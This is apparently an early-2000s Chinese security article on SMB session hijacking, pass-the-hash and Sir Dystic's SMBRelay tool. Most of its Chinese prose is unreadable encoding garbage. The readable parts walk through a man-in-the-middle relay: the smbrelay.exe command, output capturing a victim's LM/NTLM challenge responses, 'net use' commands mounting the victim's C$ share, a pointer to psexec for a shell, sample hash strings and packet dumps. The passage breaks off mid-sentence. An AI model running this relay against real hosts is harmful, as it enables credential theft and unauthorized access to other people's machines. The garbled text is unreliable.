xfocus logo xfocus title
Ê×Ò³ ½¹µãÔ­´´ °²È«ÎÄÕª °²È«¹¤¾ß °²È«Â©¶´ ½¹µãÏîÄ¿ ½¹µãÂÛ̳ ¹ØÓÚÎÒÃÇ
Ìí¼ÓÎÄÕÂ English Version

dz̸smb»á»°½Ù³Ö¾ßÌåʵÏÖ


´´½¨Ê±¼ä£º2003-05-27
ÎÄÕÂÊôÐÔ£ºÔ­´´
ÎÄÕÂÌá½»£ºciel (106130_at_sohu.com)

×÷Õߣº»ÃÓ°ÂÃÍÅ CIEL
»ÃÓ°ÂÃÍÅ£ºhttp://www.ph4nt0m.net/bbs/
E-MAIL£º106130@SOHU.COM
    ×î½üSMB»á»°½Ù³ÖÒ»¶È³ÉΪÈȵ㣬Æäʵ¹ØÓÚÕâ·½ÃæµÄÎĵµÔç¾ÍºÜÆëÈ«ÁË£¬±ÈÈç¼ÓÃÜ»úÖÆ£¬´æÔÚµÄÈõµãµÈµÈ¡£
ÕâÆªÎÄÕÂûÓÐʲô¼¼ÊõÐԵĶ«Î÷£¬Ö»ÊÇÈôó¼ÒÁ˽âÕâ·½Ãæ¹¥»÷¹ý³ÌµÄ¾ßÌåʵÏÖ¡£
    ÏÈ´Ó2¸ö¹¤¾ß̸Æð°É£¬SMBPROXYºÍSMBRELAY£¬Ò»°ãÀ´Ëµ£¬Èç¹ûÄõ½Ò»¸öÔ¶³ÌÖ÷»úNTLMHashÃÜÂëÐÅÏ¢, Ò»°ã¶¼»áʹÓñ©Á¦ÆÆ½âÀ´»ñÈ¡ÃÜÂë,SMBPROXYÔò¿ÉÒÔʹÓÃproxy·½Ê½ÓëÔ¶³ÌÖ÷»úÑéÖ¤µÇ½,À´´ïµ½¿ìËÙ½øÈëµÄÄ¿µÄ£¬Ò»°ãÕâÖÖÎļþµÄ¸ñʽÈçÏÂ
username:id:LANMAN hash:NTLM hash:::
admin:1003:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::
ʵ¼ÊÉÏ£¬Èç¹ûÎÒÃDzÉÓÃÁËCAIN£¬SCOOPLM»òÕßLC4Ò²ÓпÉÄÜÐá̽µ½Ò»Ð©SMB»á»°ÐÅÏ¢¡£¸ñʽÈçÏÂ
Username\Domain:"":"":Case insensitive password:Case sensitive password:Challenge
Administrator:"":"":89E5E3F54A998398DC36E89DDD37334C801201CA39C9A5D3:8457623684F27A5EFA5FE7B647E87C36D78616F80594123C:E3A96FF4507B9EDF
    ¿ÉÒÔ¿´³öÀ´£¬2ÕßÎÞÂÛÔÚÐÎʽ»¹ÊÇÄÚÈÝÉ϶¼ÊÇ´æÔںܴó²î¾àµÄ£¬²»¹ýLC4¶ÔÓÚÕâ2ÖÖ¸ñʽµÄÃÜÎͼÊÇ¿ÉÒÔÆÆ½âµÄ¡£ÊÂʵÉÏ£¬SMBPROXYÖ»ÄÜÀûÓõÚÒ»ÖÖ¸ñʽµÄÎļþ£¬ÖÁÓÚΪºÎÎÞ·¨ÀûÓÃÐá̽µ½µÄÊý¾Ý¸ñʽ£¬¾ÍµÃ´ÓSMB»á»°¼ÓÃÜ»úÖÆÌ¸Æð¡£
    ÔçÆÚSMBЭÒéÔÚÍøÂçÉÏ´«ÊäÃ÷ÎÄ¿ÚÁî¡£ºóÀ´³öÏÖ"LAN Manager Challenge/Response"ÑéÖ¤»úÖÆ£¬¼ò³ÆLM£¬µ«ÊǺÜÈÝÒ×±»ÆÆ½â¡£Î¢ÈíÌá³öÁËWindowsNTÌôÕ½/ÏìÓ¦ÑéÖ¤»úÖÆ£¬³ÆÖ®ÎªNTLM¡£ÏÖÔÚÒѾ­ÓÐÁ˸üÐÂNTLMv2ÒÔ¼°KerberosÑéÖ¤Ìåϵ¡£
¼ÙÈçA»úÆ÷ÊÔͼ·ÃÎÊB»úÆ÷ij¹²Ïí×ÊÔ´µÄʱºò£¬A»úÆ÷»á·¢Ë͵±Ç°µÇ½µÄÓû§ÃûºÍÃÜÂ룬ÓÉB»úÆ÷½øÐÐÑéÖ¤£¬´ËʱB»úÆ÷»áËæ»ú²úÉú8×Ö½ÚµÄÌôÕ½£¨Challenge£©£¬ËÍÍùA»ú£¬AÓÃÔ´×ÔÃ÷ÎÄ¿ÚÁîµÄDESKEY¶ÔÌôÕ½½øÐбê×¼DES¼ÓÃܵõ½ÏìÓ¦£¬²¢·¢ÍùB£¬B´ÓSAMÖлñÈ¡A·¢Ë͵ÄÓû§ÃûµÄLM Hash¡¢NTLM Hash£¬¼ÆËã³öDESKEY£¬²¢¶ÔÇ°Ãæ·¢ÍùAµÄÌôÕ½½øÐбê×¼DES¼ÓÃÜ£¬Èç¹ûË«·½±È½Ï½á¹ûÒ»Ö£¬ÄÇô¾ÍËãͨ¹ýÑéÖ¤¡£Èç¹ûÕâ´ÎµÄÑéÖ¤ÎÞ·¨³É¹¦£¬²Å»áÌáÐÑÓû§ÊäÈëÓû§ÃûºÍÃÜÂ룬Ҳ¾ÍÊÇÎÒÃdz£¼ûµÄÑéÖ¤¿ò¡£ÓÉÓû§ÌîÈëÓû§ÃûºÍÃÜÂëºóÔÙÓÃͬÑùµÄ·½Ê½½øÐÐÏÂÒ»ÂֵļÓÃÜ--ÑéÖ¤
£¨×¢Ò⣺ÕâÀïµÄ»á»°»úÖÆ½öÏÞÓÚNT£¬2K£¬Èç¹û98£¬WINMEÏò2K»òÕßNTÌá³öÇëÇóµÄ»°£¬ÄãÊÇÎÞ·¨Ñ¡ÔñÓû§ÃûµÄ£¬Ä¬ÈϵÄÓû§Ãû¾ÍÊÇÄ㵱ǰµÇ½Ãû£©
    ÎÒÃÇÏÈÀ´¿´¿´SMBPROXY¹¤×÷Ô­Àí£¬ÒòΪPWDUMP½ØÈ¡µÄÎļþÀïºóÃæÒ»ÅžÍÊÇNTLM HASH£¬ÕâÀïµÄHASHÖ±½Ó½øÐÐDES¼ÓÃÜ--·¢ËÍ--ÑéÖ¤£¬Ê¡È¥ÁËÃ÷ÎÄ¿ÚÁî¼ÓÃܵÄÄÇÒ»²½£¬ËùÒÔ£¬Êµ¼ÊÉϾͲ»ÐèÒª»ñȡʲôÃ÷ÎÄ¿ÚÁîÁË
ÏÂÃæ¾ÍÊǹ¤×÷ͼÀý£º
Legend: H£º°ÑÃ÷ÎÄ¿ÚÁî¼ÓÃܵÄËã·¨
        E  DES ¼ÓÃÜËã·¨
        D  Decryption
        P  ÊÇÃ÷ÎÄ¿ÚÁî
        S=H£¨P£©  Ã÷ÎÄ¿ÚÁî¼ÓÃܺóµÄHASH£¬Öü´æÔÚSAMÖУ¬
        N  ÌôÕ½
        A  ¿Í»§¶Ë
        B  ·þÎñÆ÷
Windows NT/2000 login:
1. A=>B: ·¢³öÇëÇó
2. B=>A: N
3. A=>B: E(N,H(P))
·þÎñÆ÷¼ì²éµÄÊÇS=D(N,E(N,H(P))) »òÕß E(N,S)=E(N,H(P)).

ÊÂʵÉÏ£¬SÎÒÃÇÊÇ¿ÉÒÔͨ¹ýPWDUMP»ñµÃµÄ£¬Ò²¾ÍÊÇ˵£¬PÒѾ­²»ÐèÒª±©Á¦ÆÆ½âÁË

Windows NT/2000 "passing the hash":
1. A=>B: ·¢³öÇëÇó.
2. B=>A: N
3. A=>B: E(N,S)
·¢ËÍS=D(N,E(N,S)) Ôò±ØÈ»¿ÉÒÔͨ¹ýÖ÷»úÑéÖ¤£¬ÎÒÃÇ´Ëʱ¾ÍÊÇÄã·¢ËÍSµÄÓû§Éí·Ý£¬Èç¹ûÄã·¢Ë͵ÄÊǹÜÀíÔ±µÄ
SÖµ£¬Äã¾ÍÊǹÜÀíÔ±£¡


ÔÚ̸SMBRELAY֮ǰÎÒÃÇÏÈ¿´¿´ÏÂÃæµÄÒ»¶ÎÎĵµ
1997Äê2ÔÂ6ÈÕ£¬Dominique Brezinski <dominique.brezinski@CyberSafe.COM>¶ÔÍâ
·¢²¼ÁËÒ»·Ý¹ØÓÚWindows NTÉí·ÝÑéÖ¤»úÖÆ´àÈõÐÔµÄÎĵµ
¼ÙÉèÓÐÖ÷»úBÓëA
(1) AÏòB·¢ÆðÁ¬½ÓÇëÇó
(2) BÏòA·¢ËÍÌôÕ½(Ò»×éËæ»úÊý¾Ý£¬8×Ö½Ú)
(3) AÓÃÔ´×ÔÃ÷ÎÄ¿ÚÁîµÄDESKEY¶ÔÌôÕ½½øÐбê×¼DES¼ÓÃܵõ½ÏìÓ¦£¬²¢·¢ÍùB
(4) B´ÓSAMÖлñÈ¡AµÄLM Hash¡¢NTLM Hash£¬¼ÆËã³öDESKEY£¬²¢¶ÔÇ°Ãæ·¢ÍùAµÄÌôÕ½½ø
    Ðбê×¼DES¼ÓÃÜ
(5) Èç¹û(4)ÖмÆËã½á¹ûÓëAË͹ýÀ´µÄÏìӦƥÅ䣬A±»ÔÊÐí·ÃÎÊB
ÏÖÔÚ¼ÙÉèÒ»¸ö¹¥»÷ÕßC¾íÈëÆäÖÐ
(1) CÏòB·¢ÆðÁ¬½ÓÇëÇó
(2) BÏòC·¢ËÍÌôÕ½D(Ò»×éËæ»úÊý¾Ý)
(3) CµÈ´ýAÏòB·¢ÆðÁ¬½ÓÇëÇó
(4) µ±AÏòB·¢ÆðÁ¬½ÓÇëÇóʱ£¬CαÔì³ÉBÏòA·¢ËÍÌôÕ½D
(5) AÓÃÔ´×ÔÃ÷ÎÄ¿ÚÁîµÄDESKEY¶ÔÌôÕ½D½øÐбê×¼DES¼ÓÃܵõ½ÏìÓ¦E£¬²¢·¢ÍùB
(6) C½Ø»ñµ½ÏìÓ¦E£¬½«Ëü×öΪÕë¶Ô(2)ÖÐÌôÕ½DµÄÏìÓ¦·¢ÍùB£¬²¢Éù³Æ×Ô¼ºÊÇA
(7) B´ÓSAMÖлñÈ¡AµÄLM Hash¡¢NTLM Hash£¬¼ÆËã³öDESKEY£¬²¢¶ÔÌôÕ½D½øÐбê×¼DES
    ¼ÓÃÜ
(8) Èç¹û(7)ÖмÆËã½á¹ûÓëCË͹ýÀ´µÄÏìӦƥÅ䣬C±»ÔÊÐíÒÔAµÄÉí·Ý·ÃÎÊB¡£



   ÔÚ½ñÌ죬Èç¹û¹¥»÷ÕßÖ»ÊDzÉÓÃÒ»°ãµÄÅÔÕßÐá̽·½Ê½£¬Ðá̽µÃµ½µÄHASHÖУ¬LM CLI-CHALLÎÞ·¨µÃµ½£¨È«Îª0£©£¬ÄÄÅÂ×Ô¼ºµÄµØÎ»ÊÇSMB SERVER£¡ÕâÀÎÒ¸ø³ö2ÖÖÇé¿öÈôó¼Ò±È½Ï
µÚÒ»ÖÖÇé¿ö£ºÎÒ×Ô¼º×öΪSMB SERVER £¬ÓÉÆäËû»úÆ÷³äµ±¿Í»§µÄ½ÇÉ«·ÃÎÊÎҵĹ²Ïí×ÊÔ´Ëù×¥µ½µÄÒ»¶ÎÊý¾Ý
Administrator:"":"":5FA055E5F1819F2900000000000000000000000000000000:FACEAAE8DD420A0EA8EBB15B6FC499CF38B0C5B3B616FE38:D29F5CC5DC662A91
ÕâÊÇÒ»¶ÎÐá̽µ½µÄ²»ÍêÕûµÄ¼ÓÃÜÊý¾Ý£¬ÓÉÓÚLM CLI-CHALLûÓÐÄܹ»»ñÈ¡µ½£¬ËùÒÔÒ²¾ÍÎÞ·¨±»ÎÒÃÇÀûÓá£
µÚ2ÖÖÇé¿ö£ºÈç¹ûÎÒÃÇ×Ô¼º³äµ±CLI£¬ÏòSMB SERVER·¢³öÇëÇó
Administrator:"":"":89E5E3F54A998398DC36E89DDD37334C801201CA39C9A5D3:8457623684F27A5EFA5FE7B647E87C36D78616F80594123C:E3A96FF4507B9EDF
ÕâÀï¾Í±È½ÏÍêÕûÁË£¬Èç¹ûµ¹ÈëLC4ÆÆ½â£¬×îÖյõ½µÄ¾ÍÊÇÎÒ×Ô¼ºµÄ¿ÚÁî¡£

    ÊÂʵÉÏ£¬ÎªÊ²Ã´SMBRELAY¹¤×÷µÄʱºòÎÒÃÇÄÜ»ñÈ¡µ½ÍêÕûµÄ»úÃÜÊý¾Ý£¬°üÀ¨LN HASH£¬NT HASH£¬NT SERV-CHALL£¬LM CLI-CHALL£¿Ô­ÒòÔÚÓÚ¹¥»÷ÕßÆÛÆ­ÁËSERVºÍCLIË«·½£¬µ£ÈÎÁËËùÓÐÊý¾ÝµÄת·¢¡£Õâ¸öʱºò£¬¾ÍÊôÓÚµÚ2ÖÖÇé¿ö£¬ÎÒÃǾÍÄÜ×¥µ½CLI·¢Ë͸øSERµÄ¿ÉÆÆ½âHASH¡£
ÏÂÃæÏȼòµ¥½éÉÜÒ»ÏÂSMBRELAYµÄ¹¤×÷Ô­Àí£º
Ô¤¶¨Ò»Ï£ºAÊǹ¥»÷Õߣ¬TSÊÇSMB·þÎñÆ÷£¬TCÊǿͻ§»ú¡£A¿ªÊ¼¶ÔË«·½½øÐÐÆÛÆ­¡£
1£ºTCÆóͼ·ÃÎÊTSµÄ¹²Ïí×ÊÔ´µÄʱºò£¬ËûÏÈÁ¬½ÓµÄÊÇA
2£ºAÏòTS·¢ËÍÒ»¸öÆóͼ·ÃÎʵÄÇëÇó
3£ºTS¸øÓèÈ·ÈÏ£¬ÔÊÐíÁ¬½Ó
4£ºA¼Ù×°³ÉTS£¬·¢ËÍÒ»¸öÔÊÐíÁ¬½ÓµÄÈ·ÈÏ»ØÓ¦TC£¬¶ø´ËʱµÄAÔòÔÙ¼Ù×°³ÉTC£¬ÏòTSѯÎÊ£º¡°would you like to     talk to me as if I'm an NT 4 box without extended security£¿¡±£¨Ò»ÖÖ²»°²È«µÄ»á»°»úÖÆ£¬¼ò³Æ        ÎªJ»á»°£©
5£ºTSÔÊÐíAµÄÇëÇó£¬Ëæ»ú²úÉúÌôÕ½£¬·¢Ë͸øA
6£ºAÔò¶ÔTCʹÓÃJ¶Ô»°·½Ê½£¬²¢ÇÒ·¢ËÍÒ»×éÌôÕ½
6£ºTCËæ¼´ÓÃA·¢ËÍÀ´µÄÌôÕ½¶Ôµ±Ç°Óû§ÃûºÍÃÜÂë½øÐмÓÃÜ£¬·¢Ë͸øA
7£ºA½«Êý¾Ýת½»¸øTS
8£ºTS±íʾÑé֤ͨ¹ý
9£ºA¶Ï¿ªÓëTCµÄÁ¬½Ó£¬Ö±½ÓÒÔTCµÄÉí·ÝÓëTS»á»°£¬Õâʱºò£¬A¾Í¿ÉÒÔÓëTS½øÐÐIPCÁ¬½Ó£¬Ó³ÉäÓ²ÅÌ£¬ÉõÖÁ»ñÈ¡       SHELL
SMBRELAYËù×öµÄ¹¤×÷£¬¾ÍÊÇͨ¹ýNAT£¨Network Address Translator£©»òÕßiptables¶ÔÊý¾Ý½øÐÐÁËÖØ¶¨Ïò£¬
²¢ÇÒ½«TSµÄ139¶Ë¿Ú°óÏòTC£¬ËùÒÔÎÒÃǺóÀ´Ó³ÉäTSµÄÓ²ÅÌʱ£¬Êµ¼ÊÉÏÈ´ÊÇTCµÄÓ²ÅÌ¡£ÕâÒ²ÊÇÔËÐÐSMBRELAYµÄ
Ö÷»ú139¶Ë¿Ú²»Äܱ»Õ¼ÓõÄÔ­Òò¡£

ΪÁ˸üºÃµÄÀí½âÆä¹¤×÷Á÷³Ì£¬ÎÒÃÇ¿ÉÒÔ½áºÏÒ»´Î¹¥»÷¹ý³ÌÀ´·ÖÎö
ÏÈÏêϸ½éÉÜÒ»ÏÂSMBRELAYµÄÓ÷¨°É
Ó÷¨£ºSMBRELAY [Ñ¡Ïî]
/D NUM   --ÉèÖõ÷ÊԵǼ¶£¬¿ÉÒÔÑ¡Ôñ0£¬1£¬2¡£Ä¬ÈÏÊÇ0
/E       --Áоٱ¾»úÍø¿¨µÄ½Ó¿Ú£¬×ª·¢Êý¾ÝµÄʱºò£¬Èç¹ûÕâÀïûѡÔñºÃ£¬¿ÉÄÜʲô¶¼×¥²»µ½
/IL  NUM --É趨ÔÚÌí¼Ó±¾µØIPµØÖ·Ê±£¬Ê¹ÓõÄÍø¿¨½Ó¿ÚºÅ¡£
/IR  NUM --É趨ÔÚÌí¼Ó´úÀíIPµØÖ·£¨¾ÍÏñʹÓÃÁËsmbporxyµÄÄÇÖÖIPµØÖ·£©Ê±£¬Ê¹ÓõÄÍø¿¨½Ó¿ÚºÅ¡£Ä¬ÈÏÊÇ1              Äã¿ÉÒÔʹÓÃ/E²ÎÊýÀ´ÁоÙÍø¿¨µÄ½Ó¿ÚºÅ¡£
/L[+] IP --É趨Ҫ½ÓÊÕNetBIOSÐÅÏ¢µÄ±¾µØIPµØÖ·¡£Ê¹ÓÃ+ÊÇΪÁËÉèÖõÚÒ»´ÎÔÚNIC£¨ÍøÂç½Ó¿Ú¿¨£©ÖÐÌí¼ÓµÄ              IPµØÖ·£¬Ä¬ÈÏÊÇʹÓñ¾»úµÄµ±Ç°IPµØÖ·¡£
/R[-] IP --É趨´úÀíIPµØÖ·µÄÆðʼ¶Ë¡£Ê¹ÓÃ-ÊÇΪÁËÉèÖõÚÒ»´ÎÔÚNIC£¨ÍøÂç½Ó¿Ú¿¨£©ÖÐÌí¼ÓµÄIPµØÖ·£¬Ä¬ÈÏ           ÊÇʹÓÃ192.1.1.1
/S name  --É趨ԭʼ»úÆ÷£¨ÓÕ¶üIP£©µÄÃû×Ö£¬Ä¬ÈÏÊÇCDC4EVER

±ØÐë×¢ÒâµÄµØ·½£º
  
   1£ºÔÚwin2kÉÏ£¬Èç¹ûϵͳһֱʹÓÃ139¶Ë¿Ú£¬SMBRelay½«²»ÄÜÕý³£µÄ¹¤×÷---°ó¶¨µ½139¶Ë¿Ú£¬ÒòΪMicrosoftÓÐ×Ô¼ºµÄÒ»Ì×ϵͳ×ÔÎÒ±£»¤µÄÖÆ¶È¡£½â¾öÕâ¸öÎÊÌâµÄ×î¼òµ¥µÄ·½·¨¾ÍÊÇʹÓÃ/L+²ÎÊýÀ´½¨Á¢Ò»¸öеÄIPµØÖ·ÔÚÎÒÃÇ×Ô¼ºµÄNIC£¨ÍøÂç½Ó¿Ú¿¨£©£¬²¢ÇÒÄãµÄÄ¿±ê½«ÏÈÁ¬½ÓÕâ¸öн¨µÄIP£¬¶ø²»ÊÇÄãµÄÕæÕýIP¡£ÁíÍâÒ»ÖÖ·½·¨ÊÇÔÚ¿ØÖưæÃæÖÐÊÖ¶¯Ìí¼ÓÒ»¸öIPµØÖ·£¬È»ºóʹÓÃ/LÀ´Ö¸¶¨Ê¹ÓÃÕâ¸öIPµØÖ·¡£
   2£ºÈç¹û¿ÉÒԵϰ£¬SMBRelay½«°ó¶¨ÏµÍ³µÄ139¶Ë¿Ú£¬µ«ÊDz¢²»ÊÇ˵Äܹ»ÕýÈ·°ó¶¨¾ÍÄܹ»ÕýÈ·µÄ½ÓÊÕÁ¬½ÓÐÅÏ¢¡£µ±SMBRelay°ó¶¨139¶Ë¿Úʱ£¬Èç¹ûϵͳ´æÔÚÈκεÄ139¶Ë¿ÚµÄÁ¬½Ó£¨°üÀ¨TIME_WAIT״̬µÄ£©£¬Ëü½«ºÜÓпÉÄܲ»Äܹ»Õý³£¹¤×÷¡£win98ÏÂÔò²»»á½ÓÊÕµ½ÈκεÄÁ¬½ÓÐÅÏ¢¡£ÔÚWindows NTÏ£¬SMBRelayÒ²¿ÉÄÜÊÇÖ»Äܹ»½ÓÊÕµ½²¿·ÖÁ¬½ÓÐÅÏ¢¡£¾ÍÒòΪÕâ¸ö£¬ÎÒ¾­³£Ö´ÐÐÁ˼¸¸öSMBRelay£¬ÓÃÒÔÔö¼ÓµÃµ½ÐÅÏ¢µÄ¿ÉÄÜÐÔ¡£ÔÚWindows 2000Ï£¬Èç¹ûϵͳÕýÔÚʹÓý«²»ÔÊÐíSMBRelayµÄ°óÈë¡£
   3£ºÔÚÄãµçÄÔÉϽ¨Á¢ÐµÄIPµØÖ·µÄʱºò£¬Äã±ØÐëÌØ±ð×¢ÒâµÄÊÇÔÚʹÓÃ/IR»ò/IL²ÎÊýʱ£¬ÄãÓ¦¸ÃÖ¸¶¨µÄʹÓõÄÍø¿¨½Ó¿ÚºÅ¡£Ê¹ÓÃ/E²ÎÊýÀ´ÁоÙÍø¿¨½Ó¿Ú£¬ºÍËûÃǵIJÎÊý¡£ÔÚNTϵͳÖУ¬Íø¿¨½Ó¿ÚºÅºÜ¼òµ¥£»ÔÚwin2kÖУ¬ËûÃÇʹÓøå×Ö½Ú£¬ËùÒÔʹÓÃ16½øÖÆÊýÀ´±íʾ¡£Èç¹ûÄ㲻ʹÓÃ/IR²ÎÊýÀ´ÉèÖôúÀíµÄÍøÂç½Ó¿Ú£¨IPµØÖ·£©Ê±£¬Ä¬ÈÏÊÇʹÓÃ1ºÅÍøÂç½Ó¿Ú£¬Õ⽫Ôì³ÉÖ»Äܹ»Ê¹ÓÃÄãµÄϵͳÀ´Á¬½ÓµÄ½á¹û¡£



ÏÂÃæÎÒÃǾÍÀ´¿´¿´SMBRELAYµÄij´Î¹¤×÷Á÷³Ì
˵Ã÷£º£ºÕâ´Î¹¥»÷¹ý³ÌËäȻֻÐèÒª2̨»úÆ÷£¬Êµ¼ÊÉϲÉÓÃÁË3¸öIP£¬¹¹³ÉÁËÖмäÈ˹¥»÷µÄÌõ¼þ
¹ØÓÚIPµØÖ·µÄ˵Ã÷£º
ÎÒµÄIPÊÇ11.197.248.212£¬¿ÉÊÇSMBRELAYÎÞ·¨ÔËÐÐÔÚÕâ¸öIPÉÏ£¬ÒòΪֻÓнûÓÃÁË139¶Ë¿Ú²ÅÄÜÔËÐÐSMBRELAY£¬¿ÉÊÇÒ»µ©139±»½ûÓã¬Ò²¾ÍÎÞ·¨ÓÃNET USE \\IPÁ¬½ÓTS¡£11.197.248.154ÊÇÒ»¸öδ±»Ê¹ÓõÄIPµØÖ·£¬ÎÒÓÃSBRELAY
ÐéÄâ³öÒ»¸öSMB SERVER£º11.197.248.154£¬²âÊÔµÄʱºò£¬Êµ¼ÊÉÏÊÇ
249£¨Êܺ¦»úÆ÷-TC£©----212£¨¹¥»÷Õß-A£©----154£¨SMB·þÎñÆ÷-TS£©

---------------------------------------------------------------------
D:\>smbrelay.exe /IL 2 /IR 2 /L+ 11.197.248.154 /R- 11.197.248.154
/*ÕâÀï°Ñ´úÀíIPÖ¸¶¨154£¬ËùÒÔÏÂÃæÓ³ÉäµÄʱºòÖ¸¶¨IPΪ154*/
SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack
Copyright 2001: Sir Dystic, Cult of the Dead Cow
Send complaints, ideas and donations to sirdystic@cultdeadcow.com
Using local adapter index 2: PCI Bus Master Adapter
Local IP address added to interface 2
Bound to port 139 on address 11.197.248.154
Connection from 12.114.28.249:1915              /*ÕâÀï249Ïò154·¢ÆðÇëÇó*/
Request type: Session Request  72 bytes
Source name: VODSER          <00>
Target name: *SMBSERVER      <20>
Setting target name to source name and source name to 'CDC4EVER'...
Response:     Positive Session Response  4 bytes

Request type: Session Message  137 bytes
SMB_COM_NEGOTIATE
Response:     Session Message  115 bytes
Challenge (8 bytes):    33C0E036880693BB        /*249Ïò154·¢³öµÄÌôÕ½*/

Request type: Session Message  290 bytes
SMB_COM_SESSION_SETUP_ANDX
Password lengths: 24 24
Case insensitive password:  FA31DD7DA7659D4DB6273B2AC9AF9FCCEA912F843B5A1874  /*LM HASH*/
Case sensitive password:    E53DFF557C5E7C37FD34FB5FD959CC26DB335F4C2AB44585  /*NTLM HSHA*/
Username:     "UUSER_VODSER"
Domain:       "VODSER"
OS:           "Windows 2000 2195"
Lanman type:  "Windows 2000 5.0"
???:          ""
Response:     Session Message  154 bytes
OS:           "Windows 5.0"
Lanman type:  "Windows 2000 LAN Manager"
Domain:       "WORKGROUP"

/*µ½ÁËÕâÀÓÉÓÚ212³É¹¦µÄ³äµ±ÁËÖмäÈ˵ĽÇÉ«£¬ËùÒÔ»ñÈ¡ÁËËùÓÐÃô¸ÐÐÅÏ¢£¬°üÀ¨249µÄChallenge£¬LM HASH £¬NTLM HASH£¬3¸öÒªËØÈ«²¿×¥È¡£¬ÒѾ­¿ÉÒÔµ¼ÈëLC4ÆÆ½âÁË*/

Password hash written to disk  
/*Óû§ÃûºÍÆÆ½âÐèÒªµÄ3×éÊý¾Ý±»ÍêÕû±£Áôµ½Ó²ÅÌ*/

Connected?
Bound to port 139 on address 11.197.248.154 relaying for host VODSER 12.114.28
.249
--------------------------------------------------------------------------------
ÕâÀï154µÄ139¶Ë¿Úʵ¼ÊÉϰóÏò249£¬ÎÒÃÇÒѾ­Äܹ»Óë154³É¹¦½¨Á¢Á¬½Ó£¬Êµ¼ÊÉÏÊÇÁ¬ÏòµÄ249
Õâ¸öʱºò£¬ÎÒÃǾͿÉÒÔ²»ÐèÒªÃÜÂëÏò154½¨Á¢IPCÁ¬½Ó£¬Éí·Ýµ±È»ÊÇ249µÇ½Óû§µÄ£¬Èç¹ûÓ³Éä154µÄÓ²ÅÌ£¬
ʵ¼ÊÉÏÒ²ÊÇÖ¸Ïò249£¬
-------------------------------------------------------------
¿ªÆôÁíÍâÒ»¸öCMD£¬ÊäÈ룺
E:\>net use \\11.197.248.154
ÃüÁî³É¹¦Íê³É¡£


E:\>net use h: \\11.197.248.154\c$
ÃüÁî³É¹¦Íê³É¡£
-----------------------------------------------------
ÏÂÃæÊÇSMBRELAYµÄÏÔʾ£º
Connection rejected: 12.114.28.249 already connected
*** Relay connection for target VODSER received from 11.197.248.212:1615
*** Sent positive session response for relay target VODSER
*** Sent dialect selection response (5) for target VODSER
*** Sent SMB Session setup response for relay to VODSER

Õâʱºò£¬±¾»úÉϵÄHÅ̾ÍÊÇÓ³ÉäµÄ249µÄCÅÌ
ÖÁ´Ë£¬Ò»´ÎÍêÕûµÄÖмäÈ˹¥»÷Íê³É¡£µ±È»£¬Èç¹û¶Ô·½ADMIN$ÊÇ´ò¿ªµÄ£¬ÎÒÃÇ»¹¿ÉÒÔÓÃpsexec»ñµÃSHELL
¸öÈ˲âÊÔµÄʱºò£¬ÓÉÓÚ»úÆ÷Çé¿öµÄ²»Í¬£¬ÕâÀïµÄÃüÁîÊäÈë¿ÉÄÜÒ²ÊÇÓвî¾àµÄ¡£

ÏÂÃæÊDzÙ×÷ÖÐÓÃIRISץȡµÄ²¿·ÖÊý¾Ý°ü£¬ÓÉÓÚ212Óë154ÔÚͬһ¸ö»úÆ÷ÉÏ£¬ËùÒÔËûÃÇÖ®¼äµÄÊý¾ÝͨѶÎÒÃÇÎÞ·¨×¥È¡µÄ£¬²»¹ý212²ÎÓëÆäÖÐÊý¾Ýת·¢µÄ¹ý³Ì»¹ÊÇ¿ÉÒÔ±»¼Ç¼ÏÂÀ´µÄ
ÏÈÊÇ249Ïò154Ìá³ö»á»°ÇëÇó£¬ÄÇЩ°üûÓÐʲôʵÖÊÄÚÈÝ£¬Ê¡ÂÔ¡£¡£
ÕâÀï249¿ªÊ¼·¢³öÌôÕ½
249----->154
00 00 E8 7B CA 4E 00 08 E3 08 43 0B 08 00 45 00  ...{.N....C...E.
00 70 FC 89 40 00 7C 06 54 45 CA 72 0F F1 DA C5  .p..@.|.TE.r....
F8 8F 10 38 00 8B 53 28 E2 07 D2 43 19 3E 50 18  ...8..S(...C.>P.
44 70 46 19 00 00 81 00 00 44 20 43 4B 46 44 45  DpF......D CKFDE
4E 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43  NECFDEFFCFGEFFCC
41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 46  ACACACACACA. EHF
44 43 4E 45 4B 45 47 44 41 44 43 43 41 43 41 43  DCNEKEGDADCCACAC
41 43 41 43 41 43 41 43 41 43 41 41 41 00        ACACACACACAAA.
212----->249
249----->212
212----->249  £¨Ò»Ð©Î޹صĻỰÄÚÈÝÎÒ»áÊ¡ÂÔ£©
212----->249
00 08 E3 08 43 0B 00 00 E8 7B CA 4E 08 00 45 00  ....C....{.N..E.
00 70 08 7C 40 00 80 06 44 69 DA C5 F8 79 CA 72  .p.|@.€.Di...y.r
0F F1 04 8C 00 8B D2 43 B8 81 53 2A 16 BB 50 18  .......C..S*..P.
44 70 8C E7 00 00 81 00 00 44 20 45 48 46 44 43  Dp.......D EHFDC
4E 45 4B 45 47 44 41 44 43 43 41 43 41 43 41 43  NEKEGDADCCACACAC
41 43 41 43 41 43 41 43 41 43 41 00 20 45 44 45  ACACACACACA. EDE
45 45 44 44 45 45 46 46 47 45 46 46 43 43 41 43  EEDDEEFFGEFFCCAC
41 43 41 43 41 43 41 43 41 43 41 42 45 00        ACACACACACABE.
249----->212
154----->249
...8..S(.O.C.BP.Dl.&.......SMBr.....S......................b..PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12.
249----->154
.......C..S*..P.DlK........SMBr............................b..PC NETWORK PROGRAM 1.0..LANMAN1.0..Windows for Workgroups 3.1a..LM1.2X002..LANMAN2.1..NT LM 0.12
×¢Ò⣺ÕâÀïÎÒ¼ô¶ÏÁËһЩ¶àÓàµÄ»á»°£¬¿ÉÒÔ¸üÇåÎúµÄ±È½Ï£¬¿´³öÕâÀïÊÇË«·½´ï³ÉÒ»ÖֻỰ»úÖÆ
¹À¼Æ¾ÍÊÇÉÏÃæÌáµ½µÄ¡°would you like to talk to me as if I'm an NT 4 box without
extended security£¿¡±ËüÃǽ¨Á¢NBT»á»°²¢·¢ËÍSMB_COM_NEGOTIATE(0x72)ÇëÇó±¨ÎÄ£¬Ö¸¶¨Ê¹ÓÃ
